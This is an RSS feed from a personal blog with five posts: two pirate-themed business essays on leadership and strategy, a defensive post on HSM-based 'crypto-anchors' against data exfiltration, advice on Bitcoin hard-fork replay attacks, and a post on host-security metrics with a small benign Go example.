<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:media="http://search.yahoo.com/mrss/"><channel><title><![CDATA[Diogo Mónica]]></title><description><![CDATA[Founder of Anchorage Digital, previously led security at Square and Docker. CEO. PhD in Computer Science. Angel investor]]></description><link>https://blog.diogomonica.com/</link><image><url>https://blog.diogomonica.com/favicon.png</url><title>Diogo Mónica</title><link>https://blog.diogomonica.com/</link></image><generator>Ghost 5.59</generator><lastBuildDate>Fri, 10 Oct 2025 05:08:49 GMT</lastBuildDate><atom:link href="https://blog.diogomonica.com/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[A Pirate's take on Command vs. Leadership]]></title><description><![CDATA[Tired of being told that you should be a leader? Do not worry. Pirate captains had great leadership skills, and they were still beaten to oblivion by Navy Captains who exercised pure command on their ships.]]></description><link>https://blog.diogomonica.com/2019/02/18/a-pirates-take-on-command-vs-leadership/</link><guid isPermaLink="false">62d8ce7b47f91800018f06e3</guid><category><![CDATA[business]]></category><category><![CDATA[pirates]]></category><category><![CDATA[leadership]]></category><dc:creator><![CDATA[Diogo Monica]]></dc:creator><pubDate>Mon, 18 Feb 2019 06:00:00 GMT</pubDate><content:encoded><![CDATA[<p><em>Tired of being told that you should be a leader? Do not worry. Pirate captains had great leadership skills, and they were still beaten to oblivion by Navy Captains who exercised pure command on their ships. Is then leadership less effective than command? Keep reading. I have all the answers. Or so my mother tells me.</em></p><!--kg-card-begin: html--><figure class="kg-card kg-image-card">
  <img src="https://blog.diogomonica.com/content/images/2019/02/01-abandoned-leader---Small.jpg" width="550">
  <figcaption>Leadership-based approaches are not necessarily more effective than pure command.</figcaption>
</figure><!--kg-card-end: html--><h2 id="the-problem">The Problem</h2><p>If you were ever at the head of a team, you probably wondered how you were performing. Were you <em>commanding</em> your team, or was it pure <em>leadership</em>? You probably even tried to read a book on the topic, but instead of the promised enlightenment, you ended up exactly where you started. You saw lists of qualities defining a <em>leader</em>, but both your soul and intellect kept screaming the obvious: should not any good <em>commander</em> possess those qualities too? So, what is the difference?</p><p>Do not fret. Your soul and intellect were right all along. Whatever qualities those books say a <em>leader</em> should possess, those are qualities that any <em>commander</em> should identically possess (incompetent commanders excluded, of course). Any framework using the model &#x201C;Leaders do &#x2018;A,&#x2019; while commanders do &#x2018;B,&#x2019;&#x201D; is wrong. If they are any good, both leaders and commanders will do the exact same things: the right ones. What distinguishes <em>leadership</em> from <em>command</em> is not what you do; it is how and why it becomes done. Furthermore, neither way is better than the other. Both may work or fail in different contexts and at different times. There are times for leadership, and there are times for command. In fact, most of us exercise both simultaneously, and we do not even get to choose which one we are using. Let me explain.</p><h2 id="pirate-ships-the-rule-of-democracy-and-leadership">Pirate ships: The rule of democracy and leadership</h2><p></p><p>Discussing the core nature of the pirate code would take us too far. Suffice it to say that pirate ships of old constituted very democratic universes. Captains (and other officials) were elected, could be deposed at any time, and had very limited powers when not in battle. The crew had the authority to determine where to go and what to plunder. If a Captain had a particular idea or plan that he wanted to pursue, he would have to convince the crew to follow his reasoning, believe in what he believed, and thus do what he wanted them to do. This required leadership.</p><blockquote><em>Leadership:</em> The ability to have people follow you, your plan, vision, or intended course of action, not because they are supposed to obey you, but because they believe and voluntarily adhere to the said vision, plan, or course of action.</blockquote><!--kg-card-begin: html--><figure class="kg-card kg-image-card">
  <img src="https://blog.diogomonica.com/content/images/2019/02/02-turtle-pirate---Small.jpg" width="550">
  <figcaption>Pirate ships. The rule of democracy and leadership.</figcaption>
</figure><!--kg-card-end: html--><h2 id="navy-ships-the-rule-of-pre-defined-order-and-command-">Navy ships. The rule of pre-defined order and command.</h2><p>Navy ships, in contrast, even when deployed to defend democracy, were never meant to exercise it. Any crew member with loud dreams of on-board voting ballots, freedom of speech, or free-will, would probably be flogged, keeled, or hanged, depending on the epoch, the ship, and the Captain&apos;s particular implementation of the Articles-of-War. When the Captain of a man-of-war made a decision, he would issue a command and people would do his bidding, because that is what they were supposed to do. The Captain commands and the crew obeys, because it is written so; because that is how their world is organized.</p><blockquote><em>Command:</em> The act of determining what other people will do, using the hierarchical or functional dependencies established in your mutual organization or context, which determine that your decisions are to be obeyed.</blockquote><!--kg-card-begin: html--><figure class="kg-card kg-image-card">
  <img src="https://blog.diogomonica.com/content/images/2019/02/03-job-list-new---Small.jpg" width="550">
  <figcaption>Navy ships. The rule of pre-defined order and command.</figcaption>
</figure><!--kg-card-end: html--><h2 id="the-world-at-large-the-rule-of-mix-and-proportion">The world at large. The rule of mix and proportion</h2><p>Let us suppose that you are chairing a meeting with your trusty employees, in which you will present the strategy that will make your enterprise survive and prosper in the next decade. You present your ideas, and because you are a knowledgeable person, passionate about your ideas, and have a good grasp on how to handle the challenges facing your company, seven of the ten people in the room become totally convinced and adhere to your vision and approach. The remaining three have doubts concerning the efficacy of your proposals, and are not fully convinced; despite that, they will do as asked, because you are the boss, and implementing your decisions is what they have been hired to do. This means that when the thing gets done, 7/10 of it will have been done through leadership, and 3/10 will have been done by command. But who&#x2019;s counting, right? You never know the score when you end a meeting.</p><p>It does not really matter why things get done, as long as the right things get done, and in a manner in which everyone feels respected and adequately valorized. There is no magic about leadership, and there is no magic about command. Be a leader or be a commander; be who you are. Sometimes, you will find that leadership will not work and things must be done by command; other times, you will find that simply issuing commands will not be effective, and that you need to go the extra mile and really convince people, getting them to adhere and believe in your vision and ideas. Be who you are, and proceed as required. Just be efficient, thoughtful, and considerate in whatever you do.</p>]]></content:encoded></item><item><title><![CDATA[A Pirate's take on Strategy vs. Tactics]]></title><description><![CDATA[Strategy vs.Tactics is one of the most written-about topics in business, but most business books seem to explain it in ways that hinder both the clarity of thought and the establishment of good conceptual frameworks.]]></description><link>https://blog.diogomonica.com/2018/10/07/a-pirates-take-on-strategy-vs-tactics/</link><guid isPermaLink="false">62d8ce7b47f91800018f06e2</guid><category><![CDATA[business]]></category><dc:creator><![CDATA[Diogo Monica]]></dc:creator><pubDate>Sun, 07 Oct 2018 16:20:25 GMT</pubDate><content:encoded><![CDATA[<p>Strategy vs. Tactics is one of the most written-about topics in business, but most business books seem to explain it in ways that hinder both the clarity of thought and the establishment of good conceptual frameworks.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://blog.diogomonica.com/content/images/2018/10/Screenshot-2018-10-06-at-13.59.58.png" class="kg-image" alt loading="lazy"><figcaption>A Pirate&apos;s take on Strategy vs Tactics</figcaption></figure><p>Are strategy and tactics really different concepts, or just different levels of the same thing? If different, in what do they differ? Should they be handled differently? The goal of this blog-post is to describe strategy and tactics from the point of view of the Captain of a pirate ship, in the hope that the analogy will be sticky enough to allow remembering the concepts the next time this topic comes up. 
Let us first set up the context, and then clarify the concepts.</p><h2 id="a-pirate-s-conundrum">A Pirate&#x2019;s conundrum</h2><p>In March 1699, after a years-long voyage as a privateer, Captain Kidd found himself in the Caribbean commanding a captured, undermanned, treasure-laden vessel (the Quedagh Merchant). There, he learned that he and his crew had been declared pirates and were to be arrested. The accusation of piracy stemmed from having captured two ships (the Quedagh being one of them), which led to an immense diplomatic and political upheaval. However, Kidd had in his possession the French passes presented to him by those ships, which made the captures legal (at least technically), and thus constituted his proof of innocence against the piracy accusations.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://blog.diogomonica.com/content/images/2018/10/william-kidd.jpg" class="kg-image" alt loading="lazy"><figcaption>Captain William Kidd</figcaption></figure><p>The situation was dire. The English, Dutch, and Portuguese navies would capture or destroy him on sight. If he was captured, he was likely to be sacrificed without a fair trial. Everybody wanted a piece of him.</p><h2 id="the-strategy">The strategy</h2><p>This is the type of situation where one can certainly use a well-designed strategy. Here is the set of strategic objectives (and their interrelations) that Kidd seems to have adopted; that is, his strategic map:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://blog.diogomonica.com/content/images/2018/10/image-1.png" class="kg-image" alt loading="lazy"><figcaption><strong>Captain Kidd&#x2019;s Strategic map</strong></figcaption></figure><p>The chosen strategy seems sensible. If he were to prove his innocence of the piracy accusations, he had to ensure that the French passes (the only documents capable of doing so) were safely delivered to the proper authorities. Furthermore, proving his innocence would require the goodwill of powerful allies, the most obvious of which were the powerful financial backers of his privateering adventure. Not only was Lord Bellomont one of these backers; he was also the Governor of New York. All in all, this made him the best possible ally and entry point into the system to prove Kidd&#x2019;s innocence, given that proving the legality of Kidd&#x2019;s captures would have entitled him to his share of the expedition profits. Delivering the passes and treasure to Bellomont was, therefore, the sensible thing to do. To reach Bellomont, however, Kidd needed to navigate to New York undetected, lest he be captured underway. This implied obtaining a new ship, because the Moorish-built Quedagh was big and highly conspicuous. Overall, his was a sound strategy.</p><h2 id="the-outcome">The outcome</h2><p>Captain Kidd did reach the lower three objectives defined in his strategy. He managed to buy a new ship, transfer a considerable part of the treasure to it, and then navigate to New York undetected (the Quedagh was left behind with the remainder of the treasure), finally reaching Lord Bellomont with the passes and part of the treasure.
His undoing was in how he did these things (his tactics), which in the end made it impossible for him to reach the remaining defined strategic objectives and, ultimately, led to his untimely death.</p><figure class="kg-card kg-image-card"><img src="https://blog.diogomonica.com/content/images/2018/10/image--1--1.png" class="kg-image" alt loading="lazy"></figure><p>Overall, his tactics to reach the strategic objective &#x201C;Ensure the goodwill of my financial backers&#x201D; were very thin. They relied solely on convincing Bellomont, who would then influence the remaining backers and the central powers. If Bellomont reported that the passes were valid, the piracy charges were unfounded, and Kidd had willingly and honestly performed his assigned commission, then the remaining backers would certainly have been won to Kidd&#x2019;s cause, for self-interest if nothing more. His tactics thus had a single point of failure (convincing Bellomont), and one whose probability of failure was unknown. It was a very thin piece of tactics, and it failed miserably.</p><p>Lord Bellomont quickly came to consider Kidd a hostile, lying, and deceiving rascal, and not only imprisoned him, but did his best to portray Kidd in the worst possible light to the central powers in London. In fact, he even came up with a backup plan to hang Kidd if the piracy charges happened to be waived.</p><p>Having failed to reach that particular strategic objective, the remaining objectives fell like a house of cards. Kidd found himself without allies, with not a single relevant person interested in sustaining his innocence, and with an increased number of powerful people committed to his demise. The end was unavoidable. He could not prove his innocence; the French passes disappeared (they were only found again in the early twentieth century), false testimonies were given, favorable facts and testimonies were disregarded, etc. In the end, he was sentenced to die on the gallows. A possibly honest but by then powerless man, completely isolated except for his unfaltering (but also powerless) wife, was left to fend off unscrupulous, powerful enemies and a biased judicial system that was out to get him. It was not even a fight; it was a massacre.</p><p>If something important is to be taken out of this sordid affair, it&apos;s this:</p><blockquote><strong>Strategy is important, but not more important than the tactics that support it.</strong></blockquote><hr><h2 id="defining-and-clarifying">Defining and clarifying</h2><p>Let us now distinguish strategy from tactics. One of the most concise definitions of these concepts was proposed by Carl von Clausewitz, (still) one of the most respected military theorists of all time. In a free translation, &#x201C;Tactics is the use of armed forces to win battles; strategy is the use of battles to win the war.&#x201D; Unfortunately, the conciseness and underlying military context of this definition make it easy to miss the real point, which often leads to confusion, especially when extrapolating these concepts to non-military contexts involving organizations, markets, and competition.</p><p>The real point is this: In war, we can find relatively well defined periods of intense activity and decisive action (to avoid the restriction to military actions&#x2014;battles&#x2014;we will simply call these periods actions), followed by periods of calm (or preparations for the next action).
Each action results in a new end-state, which contributes to a new overall balance between the conflicting foes.</p><figure class="kg-card kg-image-card"><img src="https://blog.diogomonica.com/content/images/2018/10/Screenshot-2018-10-06-at-20.00.07.png" class="kg-image" alt loading="lazy"></figure><p>Even though simplified (in real life, not all actions are sequential and, therefore, the several possible action/end-state pairs tend to create a more or less complex mesh), this view gives us all we need to define strategy and tactics.</p><blockquote><strong>Strategy</strong> is the choice of an appropriate set of end-states that will hopefully lead to the desired final outcome. (defining <strong>WHAT</strong> to accomplish)</blockquote><blockquote><strong>Tactics</strong> is the choice of the best actions (and how to best implement them) to achieve the defined end-states. (defining <strong>HOW</strong> to do it)</blockquote><p>The end-states defined in our strategy are our strategic objectives. The actions required to reach them will from now on be called tactical actions, for clarity. When we decide that we want to reach a particular end-state (having a new ship, reaching New York, leaving writing blog posts to someone who knows how to do it, or whatnot), we are defining the strategy, establishing a strategic objective; when we start discussing how to reach that end-state, we are discussing tactics, designing a tactical action.</p><p>Some tactical actions may be highly complex and/or drawn out in time. As such, they may have their own internal end-states. That is to say that, even when designing a tactical action, one may also very well need to make strategic decisions (choose end-states), albeit limited to the scope of that tactical action. To successfully change ships in the Caribbean, Kidd certainly had to follow some type of strategy, because finding a locally available adequate ship and reaching an acceptable solution for the Quedagh and the treasure must have been a messy and complicated business. However, from the point of view of Kidd&#x2019;s greater strategy, the details or decisions made in this process are &#x201C;simply&#x201D; the inner workings of the tactical action required to achieve the strategic objective &quot;Obtain a new ship&quot;. The strategic objectives of the crew members tasked with obtaining the new ship may, from the higher-level point of view of Kidd&#x2019;s global strategy, be considered tactical objectives. In fact, it frequently happens that the very same decisions may be correctly considered tactical or strategic depending solely on the point of view.</p><p>Let us pretend that Kidd assigned the acquisition of a new ship to his first mate. The strategies and tactics might then have been, from Kidd&#x2019;s and his first mate&#x2019;s points of view, the following:</p><figure class="kg-card kg-image-card"><img src="https://blog.diogomonica.com/content/images/2018/10/strategy-table-1.png" class="kg-image" alt loading="lazy"></figure><p>As shown, to accomplish the assigned mission the first mate had to design his own strategy, with clear end-states (strategic objectives) and associated tactics. But from Kidd&#x2019;s point of view the first mate&#x2019;s strategic objectives are simply details associated with his chosen tactical action. An objective such as &#x201C;Trick Mr.
X into selling his ship&#x201D; is a strategic objective for the first mate, but would be considered (at most) a tactical objective by Kidd, because it is simply an inner component of his chosen tactics.</p><p>Whenever things get murky (and they truly can), the fallback is simple: if we are defining a set of end-states leading to the desired outcome, we are designing a strategy; if we are discussing how to better reach those end-states, we are discussing tactics. Be it at whatever level it may be.</p>]]></content:encoded></item><item><title><![CDATA[Crypto Anchors: Exfiltration Resistant Infrastructure]]></title><description><![CDATA[We need to start architecting our data-flows in a way that makes it harder for attackers to continue exfiltrating sensitive data out of our infrastructures.
]]></description><link>https://blog.diogomonica.com/2017/10/08/crypto-anchors-exfiltration-resistant-infrastructure/</link><guid isPermaLink="false">62d8ce7b47f91800018f06e1</guid><category><![CDATA[crypto-anchors]]></category><category><![CDATA[infosec]]></category><dc:creator><![CDATA[Diogo Monica]]></dc:creator><pubDate>Sun, 08 Oct 2017 22:31:47 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p>I&apos;ve been thinking about a concept that <a href="https://twitter.com/nathanmccauley?ref=blog.diogomonica.com">Nathan McCauley</a> and I came up with a few years ago: <a href="https://www.youtube.com/watch?v=lrGbK6fE7bI&amp;ref=blog.diogomonica.com">crypto-anchoring</a>&#x2014;and how much impact this kind of architectural decision could have in the breaches that we&apos;ve been <a href="http://fortune.com/2017/10/02/equifax-credit-breach-total/?ref=blog.diogomonica.com">experiencing lately</a>.</p>
<img src="https://blog.diogomonica.com/content/images/2017/10/crypto-anchor.png" width="130">
<p>It turns out that the vast majority of data breaches follow a pattern like this:</p>
<ul>
<li>An attacker hacks into company X&apos;s infrastructure.</li>
<li>The attacker exfiltrates sensitive content (hashed passwords, etc.).</li>
<li>The attacker has fun with the data at home (password cracking, etc.).</li>
</ul>
<p>And even though there are thousands of different security products focused on detecting each step of the <a href="http://www.techrepublic.com/article/cybersecurity-understanding-the-attack-kill-chain-and-adversary-ecosystem/?ref=blog.diogomonica.com">attacker killchain</a>, it&apos;s time that we start architecting our applications&#x2014;and data-flows&#x2014;in a way that makes it harder for attackers to continue following the same script.</p>
<h2 id="canonicalattack">Canonical Attack</h2>
<p>Take the simplified example of a <a href="https://latesthackingnews.com/2016/12/15/1-billion-accounts-leaked-yahoos-database/?ref=blog.diogomonica.com">data-exfiltration attack</a> depicted below:</p>
<img src="https://blog.diogomonica.com/content/images/2017/10/common-database-exfil-1.png" width="500" alt="Canonical database leak attack.">
<p>In this particular example, an attacker accesses and exfiltrates the contents of the user database containing all of the user information, including the password hashes used for authentication to the service. The attacker is now free to crack these passwords anywhere, and if the attack and exfiltration of the database aren&apos;t immediately detected, you might never know what happened until the cracked passwords start being sold on the black market.</p>
<h2 id="slowingattackersdown">Slowing attackers down</h2>
<p>What if we could architect our systems such that the attacker can&apos;t use the stolen data outside of our infrastructure? Doing that would give us the following advantages:</p>
<ul>
<li>More chances for detection of the attackers, since they have to operate within our environment.</li>
<li>Logs that show precisely what pieces of data have been accessed, allowing us to assess the impact of an attack more accurately.</li>
<li>Force the attacker to work in an adversarial environment, slowing down their progression by rate-limiting services that allow access to sensitive data.</li>
</ul>
<p>By forcing the attacker to have to operate within our infrastructure, we are making them operate like a <strong>bull in a china-shop</strong>.</p>
<img src="https://blog.diogomonica.com/content/images/2017/10/bull-in-china-shop-1.jpg" width="300">
<h2 id="keepingattackersin">Keeping attackers in</h2>
<p>Let&apos;s look again at the example of our canonical database leak. If we want to force an attacker not to be able to crack a password offline, we have to make the computation of the password hash dependent on something that can&apos;t leave the data center. Maybe a key generated inside of a piece of hardware physically bolted onto your servers?</p>
<p>It turns out those already exist, and are called <a href="https://en.wikipedia.org/wiki/Hardware_security_module?ref=blog.diogomonica.com">HSMs</a> (Hardware Security Modules). You can buy your own HSMs if you&#x2019;re running your own datacenter, or use the ones available in various <a href="https://azure.microsoft.com/en-us/services/key-vault/?ref=blog.diogomonica.com">cloud providers</a>.</p>
<p>Let&apos;s take the same attack as before, but instead of simply hashing the password (<code>H(password)</code>) we first apply an operation using a key generated inside of our HSM (<code>HMAC(key, password)</code>). Adding this extra step means that the database the attacker exfiltrates contains password hashes that can&apos;t be re-computed without the ability to query the HSM.</p>
<img src="https://blog.diogomonica.com/content/images/2017/10/anchored-database-exfil-1.png" width="500" alt="Crypto-anchored User Password Access.">
<p>That brings us to the concept of a crypto-anchor:</p>
<blockquote>
<p>A Crypto-anchor is a service that forces a data-flow to only be available within the boundaries of your infrastructure.</p>
</blockquote>
<p>Let&apos;s take a look at a couple more examples of using crypto-anchors:</p>
<p><strong>Data-flow</strong>: You have a credit-card processing service that needs the ability to temporarily persist and later decrypt end-to-end encrypted credit-card data coming from a remote hardware device.</p>
<p><strong>No Crypto-Anchor</strong></p>
<p>The most straightforward way of implementing this data-flow is by giving the payments service access to the private-key that decrypts the transaction information coming from the remote credit-card reader. This has the obvious downside that an attacker that compromises the payments service can exfiltrate both the encrypted transactions <em>and</em> the private-key that is necessary to decrypt them.</p>
<img src="https://blog.diogomonica.com/content/images/2017/10/searle-no-hsm-1.png" width="500">
<p><strong>With Crypto-Anchor</strong></p>
<p>If instead we crypto-anchor this data-flow, we disallow the attacker from decrypting any of these transactions outside of our infrastructure.</p>
<p>The easiest way of doing this is to have the private key necessary for decryption stored inside an HSM, exposed behind a decryption service with strict per-service rate-limiting on the number of allowed decryptions.</p>
<img src="https://blog.diogomonica.com/content/images/2017/10/searle-hsm-1.png" width="500">
<p><strong>Data-flow</strong>: You need a tokenization system that creates a stable identifier corresponding to a specific piece of sensitive data, say a user&apos;s Social Security Number<sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup>.</p>
<p><strong>No Crypto-Anchor</strong></p>
<p>The obvious way to implement a tokenization service is to generate a random token and store a mapping between that token and a one-way hash of the sensitive piece of data.</p>
<p>Unfortunately, the maximum number of possible SSNs is just under 1 billion, making it trivial for an attacker that downloads the database to brute-force them offline.</p>
<img src="https://blog.diogomonica.com/content/images/2017/10/fidelius-2.png" width="500">
<p><strong>With Crypto-Anchor</strong></p>
<p>Similarly to the previous example, if you wanted to ensure the attacker couldn&apos;t brute-force the SSNs offline, you could add a crypto-anchor in the data-flow, turning the offline brute-force attack into an online attack.</p>
<p>The easiest way to accomplish this is to have the token generation process be a keyed one-way function that can only be computed inside of an HSM.</p>
<img src="https://blog.diogomonica.com/content/images/2017/10/fidelius-with-tokenization-1.png" width="500">
<p>If we generalize the examples above, we can easily see that when we&apos;re architecting a system that deals with sensitive data, we should make sure to:</p>
<ul>
<li>Never expose a service that stores sensitive data directly to any internet-exposed (front-end) services.</li>
<li>Split core functionality into independent services, allowing for natural crypto-anchoring points in your data flow.</li>
<li>Categorize services with different levels of security into different security zones, and rate-limit the number of API calls to the crypto-anchor on a per-zone or per-service basis.</li>
</ul>
<h2 id="conclusion">Conclusion</h2>
<p>By designing your applications in a way that ensures sensitive data-flows are crypto-anchored to your data center, you are:</p>
<ul>
<li>Slowing attackers down.</li>
<li>Gathering better information on what data was exposed.</li>
<li>Making attackers continuously risk detection by forcing them to operate on your turf.</li>
</ul>
<p>So go out there and anchor your data! &#x2693;&#xFE0F;</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>Equifax anyone? <a href="#fnref1" class="footnote-backref">&#x21A9;&#xFE0E;</a></p>
</li>
</ol>
</section>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Bitcoin hard-forks and replay attacks]]></title><description><![CDATA[Given that the fork in November might not have replay protection, you'll have to ensure you protect yourself before you transact any BTC.
]]></description><link>https://blog.diogomonica.com/2017/09/25/what-to-do-before-a-blockchain-hard-fork/</link><guid isPermaLink="false">62d8ce7b47f91800018f06e0</guid><category><![CDATA[bitcoin]]></category><dc:creator><![CDATA[Diogo Monica]]></dc:creator><pubDate>Mon, 25 Sep 2017 15:42:16 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p>Dealing with blockchain hard-forks seems to have become an unfortunate and time-consuming reality of working in the cryptocurrency space these days: all the cool kids seem to be doing it.</p>
<img src="https://blog.diogomonica.com/content/images/2017/09/forking-the-hard-way.png" width="500" alt="Forking, the hard way.">
<p>With the looming possibility of <a href="https://bitcoinmagazine.com/articles/segwit2x-and-case-strong-replay-protection-and-why-its-controversial/?ref=blog.diogomonica.com">yet another Bitcoin hard-fork</a> come November, the rumor mill has started spitting out the much expected <a href="https://cointelegraph.com/news/november-segwit2x-hard-fork-could-see-newbie-users-lose-bitcoins?ref=blog.diogomonica.com">fear-mongering articles</a>.</p>
<p>Let me start by saying that if the hard-fork does happen, and your Bitcoin isn&apos;t stored in an exchange, <strong>no immediate action will be required from you</strong>. If you are currently hosting your Bitcoin in an exchange like Coinbase or Gemini, you are beholden to those companies to do the right thing when Bitcoin forks: allow you access to both currencies. It might not happen immediately; it might not happen at all.</p>
<p>If you have your Bitcoin in an offline wallet stored in a vault somewhere (as is recommended), and have no intentions of selling your newly cloned Bitcoin, then save this article for later.</p>
<p>The reason this is a no-op for any Bitcoin holders is the fact that the newly cloned blockchain is a copy of the old blockchain: anyone attempting to move your holdings will still need a valid signature from your private key. Inaction will not lead to loss of your holdings, period.</p>
<img src="https://blog.diogomonica.com/content/images/2017/09/fork4.png" alt="Bitcoin network before and after a hard-fork. No biggie.">
<p>However, given that the fork in November might not have replay protection, you&apos;ll have to ensure you protect yourself before you transact any Bitcoin.</p>
<h4 id="whatisareplayattack">What is a replay attack?</h4>
<p>It turns out that if you fork two very similar code-bases with no protocol modifications, any message intended for a node running the new codebase is also valid for a node running the old codebase. A replay attack happens when a malicious node in one of the chains intentionally sends messages it receives to the other chain.</p>
<img src="https://blog.diogomonica.com/content/images/2017/09/fork3.png" width="500" alt="Bitcoin network with a malicious attacker replaying messages on both chains.">
<p>That brings us to the quickest solution that guarantees you don&apos;t lose access to any of your holdings in either chain: after the fork happens, ensure that <strong>the first transaction you do is transferring all your holdings from your current wallet to another wallet under your control</strong>. Doing this will make sure that, even if an attacker replays your transaction on the other chain, you&apos;re the sole person in control of the corresponding destination wallet address, thus reducing the impact of the attack to a minor annoyance.</p>
<p>Here is the list of actions to take after the fork:</p>
<ol>
<li>Use your normal Bitcoin software<sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup> to generate a new wallet and save it offline.</li>
<li>Bring your current Bitcoin wallet online, and transfer all your current holdings into the new wallet.</li>
<li>Verify that your Bitcoin has actually been sent (at least six confirmations on the blockchain).</li>
<li>Download trusted software that supports the new fork<sup class="footnote-ref"><a href="#fn2" id="fnref2">[2]</a></sup>.</li>
<li>Generate a new wallet using the new software, and save it offline.</li>
<li>Import your old wallet keys into this new software wallet, and send all the Bitcoin to your newly generated offline wallet.</li>
<li>Verify that your new currency has made it to the new wallet.</li>
</ol>
<p>I hope this helps clear up some of the confusion around the hard-fork. Be safe out there.</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>I recommend you using <a href="https://electrum.org/?ref=blog.diogomonica.com">Electrum</a> <a href="#fnref1" class="footnote-backref">&#x21A9;&#xFE0E;</a></p>
</li>
<li id="fn2" class="footnote-item"><p>There is unfortunately no software currently available for this. I&apos;ll keep you posted. <a href="#fnref2" class="footnote-backref">&#x21A9;&#xFE0E;</a></p>
</li>
</ol>
</section>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[The two metrics that matter for host security]]></title><description><![CDATA[The rise of the two metrics that matter for host security: reverse uptime and golden image freshness.
]]></description><link>https://blog.diogomonica.com/2017/09/01/two-metrics-that-matter-for-host-security/</link><guid isPermaLink="false">62d8ce7b47f91800018f06df</guid><dc:creator><![CDATA[Diogo Monica]]></dc:creator><pubDate>Fri, 01 Sep 2017 01:34:08 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p><img src="https://blog.diogomonica.com/content/images/2017/08/usertimer.gif" alt="It&apos;s the final countdown." loading="lazy"></p>
<p>As companies move their infrastructures towards ephemeral microservices, there is an opportunity to rethink some of the security metrics typically used to track infrastructure risk, such as the number of currently unpatched vulnerabilities sorted by their criticality.</p>
<p>In the same way that the adoption of Continuous Integration and Continuous Delivery (CI/CD) allows faster development and patching of application vulnerabilities, it is time for organizations to realize that they should follow the same pattern when upgrading the operating system their applications run on.</p>
<p>Instead of having a JIRA queue&#x2014;with an ever-increasing number of tickets tracking the CVEs in the Linux Kernel&#x2014;we should start tracking reverse uptime and golden image freshness.</p>
<h2 id="thetwometricsthatmatterforhostsecurity">The two metrics that matter for host security <sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup></h2>
<p>The first metric I want to mention is <strong>reverse uptime</strong>, which is a catchy name for a straightforward concept:</p>
<blockquote>
<p>Instead of looking at the time a host has been online as a proxy indicator of stability, we look at it as a proxy indicator of risk.</p>
</blockquote>
<p>A company that tracks reverse uptime as a security metric will relentlessly focus on bringing down the average uptime by automatically reimaging whichever hosts have been online the longest, thereby lowering risk.</p>
<img src="https://blog.diogomonica.com/content/images/2017/08/Blog-Post-Drawings.png" width="500" alt="Re-image from golden image">
<p>Of course, re-imaging all hosts from an out-of-date image is not ideal. This brings us to our second metric, <strong>golden image freshness</strong>:</p>
<blockquote>
<p>The time elapsed since the last build of the canonical OS image used to bootstrap hosts.</p>
</blockquote>
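<p>As a toy illustration, here is what tracking both metrics might look like in Go; the host inventory and the 24-hour budget are made up for the example:</p>
<pre><code class="language-go">package main

import (
    &quot;fmt&quot;
    &quot;time&quot;
)

// Host is a hypothetical inventory record.
type Host struct {
    Name     string
    BootedAt time.Time
}

func main() {
    // Golden image freshness: time since the canonical image was built.
    goldenImageBuiltAt := time.Now().Add(-36 * time.Hour)
    fmt.Printf(&quot;golden image freshness: %v\n&quot;, time.Since(goldenImageBuiltAt))

    hosts := []Host{
        {&quot;web-1&quot;, time.Now().Add(-2 * time.Hour)},
        {&quot;web-2&quot;, time.Now().Add(-720 * time.Hour)}, // a month online
    }

    // Reverse uptime: anything online longer than the budget gets re-imaged.
    const maxUptime = 24 * time.Hour
    for _, h := range hosts {
        if up := time.Since(h.BootedAt); up &gt; maxUptime {
            fmt.Printf(&quot;%s: uptime %v exceeds budget, schedule re-image\n&quot;, h.Name, up)
        }
    }
}
</code></pre>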
<p>Here are the main reasons to track these two metrics:</p>
<ul>
<li>OS Drift is a common cause of downtime. Reimaging hosts reduces unexpected divergences in configuration.</li>
<li>It becomes significantly harder to backdoor or maintain persistence on compromised nodes, since it forces the attacker to go after components like the firmware.</li>
<li>Updating the kernel is no longer an issue, since updating the golden image ensures hosts will be upgraded within a time-bounded window.</li>
<li>The golden image is now the single point of control, making it easier to audit, scan, sign and verify what is running on the hosts.</li>
</ul>
<p>Continuously driving down both reverse uptime and golden image freshness will significantly reduce the risk posed by the most dangerous type of vulnerability there is: <strong>old-days</strong>.</p>
<h2 id="theriseofosrollingdeploys">The rise of OS rolling-deploys</h2>
<p>Of course, tracking reverse uptime is a lot easier if you have an infrastructure where you can do hitless OS rolling deploys. But that, dear reader, is precisely the point. Caring about reverse uptime will ensure that your IT organization will get to the point where your oldest host has been online for hours, not years.</p>
<img src="https://blog.diogomonica.com/content/images/2017/08/Screen-Shot-2017-08-30-at-3.15.06-PM.png" width="400" alt="Rolling deploy from golden image">
<p>The good news is that there are several projects out there that will make it easier to automate this process. Projects like <a href="https://www.terraform.io/?ref=blog.diogomonica.com">Terraform</a> and <a href="https://github.com/docker/infrakit?ref=blog.diogomonica.com">InfraKit</a> allow you to safely and predictably change your production infrastructure. Projects like <a href="https://www.packer.io/?ref=blog.diogomonica.com">Packer</a> and <a href="https://github.com/linuxkit/linuxkit?ref=blog.diogomonica.com">LinuxKit</a> allow you to rebuild your OS images continuously.</p>
<h2 id="conclusion">Conclusion</h2>
<p>With the rise in popularity of tools like <a href="https://github.com/linuxkit/linuxkit?ref=blog.diogomonica.com">LinuxKit</a> for OS image building and <a href="https://github.com/docker/infrakit?ref=blog.diogomonica.com">InfraKit</a> for automated infrastructure rolling-deploys, refreshing every host in your infrastructure on a regular basis is no longer a pipe-dream&#x2014;making reverse uptime and golden image freshness the two most important metrics to track for host security.</p>
